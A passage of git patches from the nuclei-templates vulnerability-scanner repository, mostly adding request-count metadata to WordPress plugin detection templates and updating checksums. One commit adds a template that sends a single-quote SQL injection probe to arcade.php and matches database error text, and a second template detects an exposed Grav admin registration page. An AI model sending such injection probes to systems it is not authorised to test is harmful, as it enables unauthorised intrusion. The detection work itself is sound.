reference:
- https://wordpress.org/plugins/wordfence/
metadata:
+ max-request: 1
plugin_namespace: wordfence
wpscan: https://wpscan.com/plugin/wordfence
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index 6786cab703..c25b2c1c48 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wordpress-importer/
metadata:
+ max-request: 1
plugin_namespace: wordpress-importer
wpscan: https://wpscan.com/plugin/wordpress-importer
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 784ba22c8a..4d6dd14d25 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wordpress-seo/
metadata:
+ max-request: 1
plugin_namespace: wordpress-seo
wpscan: https://wpscan.com/plugin/wordpress-seo
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 72ff55e58a..7ca0870ed6 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/worker/
metadata:
+ max-request: 1
plugin_namespace: worker
wpscan: https://wpscan.com/plugin/worker
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 8cfaa0f5a9..4f0d9be568 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-fastest-cache/
metadata:
+ max-request: 1
plugin_namespace: wp-fastest-cache
wpscan: https://wpscan.com/plugin/wp-fastest-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index 85900a01a7..f3c481b824 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-file-manager/
metadata:
+ max-request: 1
plugin_namespace: wp-file-manager
wpscan: https://wpscan.com/plugin/wp-file-manager
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index a7ccde0b49..ba214fd7ea 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-google-maps/
metadata:
+ max-request: 1
plugin_namespace: wp-google-maps
wpscan: https://wpscan.com/plugin/wp-google-maps
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 422664a98c..8f5fe8d9a5 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-mail-smtp/
metadata:
+ max-request: 1
plugin_namespace: wp-mail-smtp
wpscan: https://wpscan.com/plugin/wp-mail-smtp
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index f0af3a748a..0458b13354 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-maintenance-mode/
metadata:
+ max-request: 1
plugin_namespace: wp-maintenance-mode
wpscan: https://wpscan.com/plugin/wp-maintenance-mode
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index f89f1a20b3..d570be07bf 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-migrate-db/
metadata:
+ max-request: 1
plugin_namespace: wp-migrate-db
wpscan: https://wpscan.com/plugin/wp-migrate-db
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index 01fb12d0ad..ee05e3add8 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-multibyte-patch/
metadata:
+ max-request: 1
plugin_namespace: wp-multibyte-patch
wpscan: https://wpscan.com/plugin/wp-multibyte-patch
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index 1773857e15..df2487955f 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-optimize/
metadata:
+ max-request: 1
plugin_namespace: wp-optimize
wpscan: https://wpscan.com/plugin/wp-optimize
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index bcd1509c68..79ff01211c 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-pagenavi/
metadata:
+ max-request: 1
plugin_namespace: wp-pagenavi
wpscan: https://wpscan.com/plugin/wp-pagenavi
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index c6aca20a60..23414b3d1d 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-reset/
metadata:
+ max-request: 1
plugin_namespace: wp-reset
wpscan: https://wpscan.com/plugin/wp-reset
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index 783d381ed8..a04ddc6003 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-sitemap-page/
metadata:
+ max-request: 1
plugin_namespace: wp-sitemap-page
wpscan: https://wpscan.com/plugin/wp-sitemap-page
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 8bdc600063..2ead906817 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-smushit/
metadata:
+ max-request: 1
plugin_namespace: wp-smushit
wpscan: https://wpscan.com/plugin/wp-smushit
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index ab61cc0338..dedd2e23b6 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-statistics/
metadata:
+ max-request: 1
plugin_namespace: wp-statistics
wpscan: https://wpscan.com/plugin/wp-statistics
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 5f6fbc1f75..03cd7137a8 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-super-cache/
metadata:
+ max-request: 1
plugin_namespace: wp-super-cache
wpscan: https://wpscan.com/plugin/wp-super-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index d67150d038..a68d4b7d78 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-user-avatar/
metadata:
+ max-request: 1
plugin_namespace: wp-user-avatar
wpscan: https://wpscan.com/plugin/wp-user-avatar
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index beeba7ca69..bf9dfc3ad8 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wpcf7-recaptcha/
metadata:
+ max-request: 1
plugin_namespace: wpcf7-recaptcha
wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index c225df7bfd..47911a86a5 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wpcf7-redirect/
metadata:
+ max-request: 1
plugin_namespace: wpcf7-redirect
wpscan: https://wpscan.com/plugin/wpcf7-redirect
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index aaad04cb76..1c25b6f488 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wpforms-lite/
metadata:
+ max-request: 1
plugin_namespace: wpforms-lite
wpscan: https://wpscan.com/plugin/wpforms-lite
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index ff750a7d2a..b36317acd8 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wps-hide-login/
metadata:
+ max-request: 1
plugin_namespace: wps-hide-login
wpscan: https://wpscan.com/plugin/wps-hide-login
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index f1e7595ccd..5eb35dd17e 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wpvivid-backuprestore/
metadata:
+ max-request: 1
plugin_namespace: wpvivid-backuprestore
wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index 4b2769ee46..ceb2b8d600 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/yith-woocommerce-wishlist/
metadata:
+ max-request: 1
plugin_namespace: yith-woocommerce-wishlist
wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
tags: tech,wordpress,wp-plugin,top-100,top-200
From e3af0c3631ef41c3273cb526001410c4b8183659 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sat, 24 Jun 2023 23:27:14 +0530
Subject: [PATCH 524/670] misc update
---
CONTRIBUTING.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index ccc3257d16..081d422cf7 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -30,8 +30,8 @@ git remote add upstream https://github.com/projectdiscovery/nuclei-templates
```sh
git remote update
-git checkout master
-git rebase upstream/master
+git checkout main
+git rebase upstream/main
```
## Step 3 : Create your Template Branch
From e406a9a8300df667bd011100d27ffe8423f80481 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Sat, 24 Jun 2023 23:52:08 +0530
Subject: [PATCH 525/670] Create grav-register-admin.yaml
---
.../misconfiguration/grav-register-admin.yaml | 29 +++++++++++++++++++
1 file changed, 29 insertions(+)
create mode 100644 http/misconfiguration/grav-register-admin.yaml
diff --git a/http/misconfiguration/grav-register-admin.yaml b/http/misconfiguration/grav-register-admin.yaml
new file mode 100644
index 0000000000..77daa8f616
--- /dev/null
+++ b/http/misconfiguration/grav-register-admin.yaml
@@ -0,0 +1,29 @@
+id: grav-register-admin
+
+info:
+ name: Grav Register Admin User - Detect
+ author: DhiyaneshDk
+ severity: high
+ metadata:
+ max-request: 1
+ verified: true
+ shodan-query: title:"Grav Register Admin User"
+ tags: misconfig,grav,register,admin,exposure
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/admin"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'Grav Register Admin User | Grav'
+ - 'admin accounts'
+ condition: and
+
+ - type: status
+ status:
+ - 200
From 4cbcaba0c655b17b33707335dce84840ad591e06 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Sat, 24 Jun 2023 18:22:25 +0000
Subject: [PATCH 526/670] Auto Generated New Template Addition List [Sat Jun 24
18:22:25 UTC 2023] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 82f3228a16..2693209156 100644
--- a/.new-additions
+++ b/.new-additions
@@ -10,4 +10,5 @@ http/exposed-panels/axxon-client-panel.yaml
http/exposed-panels/syncserver-panel.yaml
http/exposures/configs/aws-config.yaml
http/exposures/configs/aws-credentials.yaml
+http/misconfiguration/grav-register-admin.yaml
http/misconfiguration/odoo-unprotected-database.yaml
From 19610568a3384d1f9ce38ff68f8c1f2be555669e Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sat, 24 Jun 2023 23:52:39 +0530
Subject: [PATCH 527/670] lint and format fix
---
http/vulnerabilities/php-arcade-sqli.yaml | 29 ++++++++++++++++++
.../vbulletin/arcade-sql-inj.yaml | 30 -------------------
2 files changed, 29 insertions(+), 30 deletions(-)
create mode 100644 http/vulnerabilities/php-arcade-sqli.yaml
delete mode 100644 http/vulnerabilities/vbulletin/arcade-sql-inj.yaml
diff --git a/http/vulnerabilities/php-arcade-sqli.yaml b/http/vulnerabilities/php-arcade-sqli.yaml
new file mode 100644
index 0000000000..c246a2a961
--- /dev/null
+++ b/http/vulnerabilities/php-arcade-sqli.yaml
@@ -0,0 +1,29 @@
+id: php-arcade-sqli
+
+info:
+ name: PHP QUICK ARCADE 3.0.21 - SQL Injection
+ author: MaStErChO
+ severity: high
+ description: |
+ A vulnerability was found in Jcink PHP-Quick-Arcade 3.0.21 (Programming Language Software). It has been declared as critical. This vulnerability affects an unknown code of the file Arcade.php. The manipulation of the argument id with an unknown input leads to a sql injection vulnerability. The CWE definition for the vulnerability is CWE-89. The software constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component.
+ reference:
+ - https://www.exploit-db.com/exploits/29604
+ - https://vuldb.com/?id.53008
+ - https://github.com/OWASP/vbscan/
+ tags: arcade,sqli
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/arcade.php?act=Arcade&do=stats&comment=a&s_id=1'"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "mySQL error"
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/vbulletin/arcade-sql-inj.yaml b/http/vulnerabilities/vbulletin/arcade-sql-inj.yaml
deleted file mode 100644
index 31a903225e..0000000000
--- a/http/vulnerabilities/vbulletin/arcade-sql-inj.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: arcade-php-sql-injection
-
-info:
- name: arcade.php SQL Injection
- author: MaStErChO
- severity: high
- description: |
- The arcade.php script is vulnerable to SQL injection. By exploiting this vulnerability, an attacker can manipulate the SQL queries executed by the script, potentially gaining unauthorized access to the database.
-
- reference:
- - https://www.exploit-db.com/exploits/29604
- - https://github.com/OWASP/vbscan/
-
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}/arcade.php?act=Arcade&do=stats&comment=a&s_id=1'"
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "mySQL error"
-
- - type: status
- status:
- - 200
-
From 43f5e35b79ae42db0594321e193fc426e14e4bf2 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Sat, 24 Jun 2023 18:22:40 +0000
Subject: [PATCH 528/670] Auto Generated Templates Checksum [Sat Jun 24
18:22:40 UTC 2023] :robot:
---
templates-checksum.txt | 407 +++++++++++++++++++++--------------------
1 file changed, 204 insertions(+), 203 deletions(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index 8855752391..4b21a2b60c 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -1,5 +1,5 @@
CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593
-CONTRIBUTING.md:b3dbbd3a35dd55d57ddbe460e18407806afeeab0
+CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71
LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df
PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7
README.md:5d758a72e5dfca78e2b8bca52a2857dd08de1fbf
@@ -3938,6 +3938,7 @@ http/misconfiguration/graphql/graphql-array-batching.yaml:f8195b045be9e30fa9215b
http/misconfiguration/graphql/graphql-field-suggestion.yaml:774a6f99933e22ea8e3c0a6987748d32162d71db
http/misconfiguration/graphql/graphql-get-method.yaml:b2f6cd219ca2117a2fab9a9145c488b89a600acf
http/misconfiguration/graphql/graphql-playground.yaml:791736c821562ea09fef7b49bd146de709c47ec1
+http/misconfiguration/grav-register-admin.yaml:f80f0d8b6991916ed793dd28151f9e65fd16b310
http/misconfiguration/hadoop-unauth-rce.yaml:3d39991821296cf7d1aba075286ee111f25991b2
http/misconfiguration/haproxy-exporter-metrics.yaml:bed30cee7f8cfa31c5896170da6c1c55dc64ae2e
http/misconfiguration/haproxy-status.yaml:e64b16ad4d2303dccf83416862651941caeaea72
@@ -5167,7 +5168,7 @@ http/technologies/mongoose-server.yaml:80820020bb7e8c6bc6e3fb04c48fb85609625d9e
http/technologies/monstracms-detect.yaml:fb3cc6ca939b7e7de438a679dad2e319b565196b
http/technologies/moveit-transfer-detect.yaml:c5f47883b00a8d1a44099bf218e81ad46b3c16bd
http/technologies/mrtg-detect.yaml:6248e2f9fa7f6243e91b4348bf6e2627af1c7513
-http/technologies/nacos-version.yaml:c662c60fae962bd6e94a5fc983fae12748da33db
+http/technologies/nacos-version.yaml:2c708c3b1fe279d3dde583711cd2cd837aa98bf0
http/technologies/neos-detect.yaml:6fa3c73066cb99e7c55ebccd3a0d4ddf6e28c7c2
http/technologies/netsweeper-webadmin-detect.yaml:c415f210db99b49ef0eb490bdfa2a440f67e508f
http/technologies/nextcloud-detect.yaml:0c47f78f2b379f7e93168520ab3a140894456a47
@@ -5294,213 +5295,213 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
-http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
+http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
+http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
-http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
-http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
-http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
-http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
-http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
-http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
-http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
-http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
-http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
-http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
-http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
-http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
-http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
-http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2
-http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
-http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
-http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
-http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
-http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
-http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
-http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
-http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
-http/technologies/wordpress/plugins/custom-fonts.yaml:37900c349918911000d5a7eae87769e978e21988
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
-http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
-http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
-http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
-http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
-http/technologies/wordpress/plugins/easy-google-fonts.yaml:df81c34d041dc7b560434f676ad74b5d5d74d01a
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72
-http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77
-http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb
-http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8
-http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f
-http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2
-http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5
-http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9
-http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33
-http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4
